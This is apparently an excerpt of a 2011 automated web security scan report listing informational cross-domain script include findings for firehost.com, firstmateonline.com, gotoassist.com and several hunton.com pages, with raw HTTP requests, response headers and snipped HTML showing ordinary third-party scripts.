Severity:   Information
Confidence:   Certain
Host:   http://www.firehost.com
Path:   /secure-hosting/pci

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /secure-hosting/pci?_kk=PCI%20compliance%20scanning&_kt=538c084f-5d5b-43c7-83f9-c71a7300c9e6&gclid=CLyMisrV1KgCFQNx5Qodz0X8fA HTTP/1.1
Host: www.firehost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 20:16:53 GMT
Content-Length: 31607


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us">
<head>
   <meta http-equiv="C
...[SNIP]...
</script>
   <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</div>
   
   
<script type="text/javascript" src="https://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8550.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<img id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gs_noscript_130-65_en.gif" />
   <script type="text/javascript" src="//seal.globalsign.com/SiteSeal/gs_image_130-65_en.js" defer></script>
...[SNIP]...
25.43. http://www.firstmateonline.com/businessinfo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstmateonline.com
Path:   /businessinfo.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /businessinfo.php?location=17044&sponsor=8159 HTTP/1.1
Cookie: fancyform=d9c8713861eb02680a2466c6a2547880; PHPSESSID=1efaeee0b0a2648e13c04a21839ee72b; zZ=a0
Host: www.firstmateonline.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:24:25 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 15409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/templates/fmHaloLeftNav002.dwt" codeOutsideHTMLIsLocked="fals
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
25.44. http://www.gotoassist.com/en_US/pageNotFound.tmpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gotoassist.com
Path:   /en_US/pageNotFound.tmpl

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en_US/pageNotFound.tmpl HTTP/1.1
Host: www.gotoassist.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webVisitor=FirstVisit%3D1304731133576%26LastVisit%3D1304731133576; webSession=SessionInfo%3D12834167%253A0D30141EEEA9EC4

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:35:17 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html
Content-Length: 7911

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">


       <html>
<head>
   <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
   
...[SNIP]...
</script>
<script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0010/2626.js"> </script>
...[SNIP]...
25.45. http://www.hunton.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:25:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1838; path=/
Set-Cookie: PortletId=5975402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=idrgpo55lx2dglzrv5uxvf55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private, no-store
Expires: Fri, 06 May 2011 23:25:55 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 236078
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>

...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
25.46. http://www.hunton.com/aboutus/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /aboutus/uniGC.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /aboutus/uniGC.aspx?xpST=AboutUs HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.3.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:27:34 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1844; path=/
Set-Cookie: PortletId=5981402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
25.47. http://www.hunton.com/alan_kailer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /alan_kailer/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /alan_kailer/ HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:28:19 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
25.48. http://www.hunton.com/contactus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /contactus/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contactus/ HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1849; PortletId=5986402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7; sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:26:57 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1857; path=/
Set-Cookie: PortletId=5994402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43836


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
25.49. http://www.hunton.com/dallas-united-states-of-america/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /dallas-united-states-of-america/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dallas-united-states-of-america/ HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; DefaultCulture=en-US; Mode=1; EventingStatus=1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; NavId=1846; PortletId=5983402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:28:17 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1853; path=/
Set-Cookie: PortletId=5990402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42103


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
25.50. http://www.hunton.com/disclaimer/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /disclaimer/uniGC.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /disclaimer/uniGC.aspx?xpST=Disclaimer HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:30:25 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1855; path=/
Set-Cookie: PortletId=5992402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 50724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
25.51. http://www.hunton.com/news/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /news/uniGC.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/uniGC.aspx?xpST=PENSearch HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:26:55 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1849; path=/
Set-Cookie: PortletId=5986402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=1c95740e-93e3-4ab2-893b-b01eb3a4d9a2; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 170703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
25.52. http://www.hunton.com/private_wealth_advisors/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /private_wealth_advisors/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /private_wealth_advisors/ HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/services/uniGC.aspx?xpST=ServiceList
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:29:45 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1847; path=/
Set-Cookie: PortletId=5984402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
25.53. http://www.hunton.com/professionals/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalSearch HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
